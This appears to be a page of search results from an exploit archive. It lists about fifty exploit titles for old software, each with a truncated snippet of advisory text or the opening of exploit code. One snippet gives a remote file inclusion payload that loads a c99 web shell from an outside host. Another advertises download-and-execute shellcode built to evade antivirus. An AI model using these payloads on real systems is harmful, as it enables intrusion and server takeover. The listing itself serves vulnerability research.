56796 matches found
VU Case Manager Authentication Bypass
No description provided by source. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...
Irix LPD tagprinter - Command Execution
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
Serva 2.0.0 - HTTP Server GET Remote Denial of Service Vulnerability
No description provided by source. !/usr/bin/python Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability Version: v2.0.0 Date: 2013-01-14 Author: Julien Ahrens @MrTuxracer Homepage: www.inshell.net Software Link: http://www.vercot.com Tested on: Windows XP SP3...
Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability
No description provided by source. ============================================================================================== Powie's PHP Forum = v1.29a editpoll Remote SQL Injection Exploit =============================================================================================== Critic...
Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31403/info Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings to view...
PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities
No description provided by source. ------------------------------------------------------------ PHPFox v3.6.0 build3 Multiple SQL Injection vulnerabilities ------------------------------------------------------------ == Description == - Software link: http://www.phpfox.com - Affected versions:...
Oto Galery 1.0 - Multiple SQL Injection Vulnerabilities
No description provided by source...
Shape Web Solutions CMS SQL Injection Vulnerability
No description provided by source. Shape Web Solutions CMS SQL Injection Vulnerability Exploit Title: Shape Web Solutions CMS SQL Injection Vulnerability Author: Ashiyane Digital Security Team Date: 03-18-2011 Vendor or Software Link: http://www.shapeweb.com.br/ Version: All version Category::...
XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)
No description provided by source. !/usr/bin/perl rewritten because perl is more elegant than php payload taken from original that ratboy submitted use strict; use Net::IRC; my $nick, $server, $port, $channel, $victim = @ARGV; my $irc = new Net::IRC; my $connect = $irc - newconn Nick = $nick,...
Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service
No description provided by source. source: http://www.securityfocus.com/bid/5027/info A problem with Microsoft Internet Explorer may make it possible to deny service to users of the browser. The problem is in the handling of certain types of stylesheet input. It may be possible to crash IE. When ...
IBM AIX 5.2/5.3 FTP Client Local Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25077/info The IBM AIX FTP application is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. A...
MySQL MaxDB 7.5 WAHTTP Server Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/11843/info A remote denial of service vulnerability has been reported to affect the MySQL MaxDB WAHTTP server. This issue is due to a failure of the server to handle malformed requests. An attacker may leverage this issue...
VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)
No description provided by source. !/usr/bin/env python VLC Media Player = 1.0.3 RTSP Buffer Overflow PoC OSX/Linux Found By: DrIDE Tested On: OSX 10.6.2 v1.0.3 Tested On: Ubuntu 9 2.6.28-15-generic v0.9.9a Tested On: No Go on Windows header1 = ?xml version=\1.0\ encoding=\UTF-8?\n header1 +=...
Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28842/info Wikepage Opus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of a...
Free Image & File Hosting Upload Vulnerability
No description provided by source...
ovidentia 5.6.x/5.8 search.php babInstallPath Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files...
Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln
No description provided by source. Picturesolution = v2.1 config.php path Remote File Inclusion Vulnerabilities Found By : Mogatil , http://www.hackteach.org/cc/ Posted By : Cold z3ro , http://www.hackteach.org/cc/ Exploit : /install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt? Examp...
WAN Emulator 2.3 - Command Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
m-phorum 0.3 Index.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25394/info m-phorum is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the...
TekBase All-in-One 3.1 - Multiple SQL Injection Vulnerabilities
No description provided by source. Author: n3wb0ss Date: 15/06/09 Contact: [email protected] Software: TekBase All-in-One 3.1 Vendor: tekbase.de Example: http://demo.tekbase.de/ Vendor contacted: No Risk: High I found this website on a german board, looking for another script. Looks to me, li...
NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NewLife Blogger = v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: NewLife...
Wordpress Euclid Theme 1.x.x - CSRF Vulnerability
No description provided by source. Title : Wordpress Euclid V1 Themes CSRF File Upload Vulnerability Author : DevilScreaM Date : 11/17/2013 - 17 November 2013 Category : Web Applications Type : PHP Version : 1.x.x Vendor : http://freelancewp.com Download :...
Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities
No description provided by source. Jetik Emlak ESA 2.0 System Script KayitNo multiple remote sql inj ---------------------------------------------------------- Discovered By: ZoRLu Date: 24.09.2008 contact: [email protected] contact: [email protected] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA :...
IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (4)
No description provided by source. source: http://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LCMESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM...
Claroline 1.8.9 phpbb/viewtopic.php URL XSS
No description provided by source. source: http://www.securityfocus.com/bid/30269/info Claroline is prone to multiple input-validation vulnerabilities: 1. Multiple cross-site scripting vulnerabilities. 2. A remote URI-redirection vulnerability. An attacker may leverage these issues to execute...
Jetbox CMS 2.1 - Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/24077/info Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromis...
WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/26430/info WebEx is prone to multiple remote denial-of-service vulnerabilities. Attackers can exploit these issues to crash applications that use the ActiveX control, denying service to legitimate users. html head script...
Dropbear SSH <= 0.34 Remote Root Exploit
No description provided by source. / Linux x86 Dropbear SSH = 0.34 remote root exploit coded by live You'll need a hacked ssh client to try this out. I included a patch to openssh-3.6.p1 somewhere below this comment. The point is: the buffer being exploited is too small25 bytes to hold our...
Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28034/info Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script...
SpiderSales 2.0 Shopping Cart Multiple Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/9799/info Multiple vulnerabilities have been identified in the application that may allow an attacker to obtain the private cryptographic key and gain access to sensitive information. The application is also reported pron...
FTPshell Server <= 3.38 Remote Denial of Service Exploit
No description provided by source. !/usr/bin/perl Usage: FTPShellFTPDOS.pl ip user pass FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ; my$socket = ; for $i = 1; $i = 40; $i++ if $socket =...
IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass
No description provided by source. toStaticHTML: The Second Encounter CVE-2012-1858 HTML Sanitizing Bypass - CVE-2012-1858http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858 Original advisory -...
WordPress SolveMedia 1.1.0 CSRF Vulnerability
No description provided by source. Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability Release Date: 24/01/13 Author: Junaid Hussain - illSecure Research Group - Contact: [email protected] | Website: http://illSecure.com Software Link:...
Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
No description provided by source. !/usr/bin/python Title: Microsoft Windows Vista/Server 2008 nsiproxy.sys Local Kernel DoS Exploit Author: Lufeng Li of Neusoft Corporation Vendor: www.microsoft.com Vulnerable: Windows Vista/Server 2008 from ctypes import kernel32 = windll.kernel32 Psapi =...
Download & Exec polymorphed shellcode Engine
No description provided by source. Download & Exec polymorphed shellcode engine POC This downloading and execution code is not detectable by popular AVs. Greetz 2: DarkEagle and Unl0ck researcherz; Str0ke and milw0rm; HD Moor and metasploit project; Maxus, Fuchunic, YrSam, Garry; Offtopic and PTT...
MS IE 5.0 Download Behavior Vulnerability
No description provided by source. Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 Download Behavior Vulnerability source: http://www.securityfocus.com/bid/674/info The download behavior feature of Microsoft's Internet Explorer 5 may allow a malicious web site operator to...
Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities
No description provided by source. Details ================ Software: Twitget Version: 3.3.1 Homepage: http://wordpress.org/plugins/twitget/ Advisory ID: dxw-1970-435 CVE: CVE-2014-2559 CVSS: 6.4 Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N Description ================ CSRF/XSS vulnerability in Twitget 3.3...
Versant Object Database <= 7.0.1.3 Commands Execution Exploit
No description provided by source. Versant server = 7.0.1.3 Arbitrary Commands Execution Exploit Exploit-DB mirror: http://www.exploit-db.com/sploits/2008-versantcmd.zip milw0rm.com 2008-03-04...
Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS Internet Information Services. This condition affects IIS 4.0 and IIS 5.0...
Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability
No description provided by source...
Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4)
No description provided by source. source: http://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for...
CPanel 10 DNSlook.HTML Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/21142/info Cpanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the...
Splunk <= 4.3.3 Arbitrary File Read
No description provided by source. Exploit Title: Splunk = 4.3.3 Reading Arbitrary Files Contents Date: 09/03/2012 Exploit Author: Marcio Almeida [email protected] Vendor Homepage: http://www.splunk.com/ Software Link: http://www.splunk.com/download?r=header Version: 4.3.3 and priors...
Linux Kernel <= 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow
No description provided by source. / int overflow in ipoptionsget Copyright Georgi Guninski Cannot be used in vulnerability databases like securityfocus and mitre / include unistd.h include stdlib.h include stdio.h include errno.h include ctype.h include string.h include sys/types.h include...
Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/18227/info Portix-PHP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to have...
Ultra Mini HTTPD 1.21 - Stack Buffer Overflow
No description provided by source. Exploit Title: Ultra Mini HTTPD stack buffer overflow Date: 10 July 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on...
CPanel <= 11 PassWDMySQL Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22474/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browse...
Joomla Component com_biblestudy LFI Vulnerability
No description provided by source. @=======================================@ @=Script : Joomla Component combiblestudy @=Author : FL0RiX @=Greez : Deep-Power ,Pyske,Wretch-x & All Friends @=Bug Type : Local File Inlusion @=Dork : inurl:combiblestudy @=======================================@ @=Vul...
Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/26800/info Roundcube Webmail is prone to an input-validation vulnerability because it fails to sanitize HTML email messages. Attackers can exploit this issue to execute arbitrary script code in the browser of an...
IRIX 5.2/5.3/6.x telnetd Environment Variable Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1572/info A vulnerability exists in the telnet daemon shipped with Irix versions 6.2 through 6.5.8, and in patched versions of the telnet daemon in Irix 5.2 through 6.1, from Silicon Graphics SGI. The telnetd will blindly...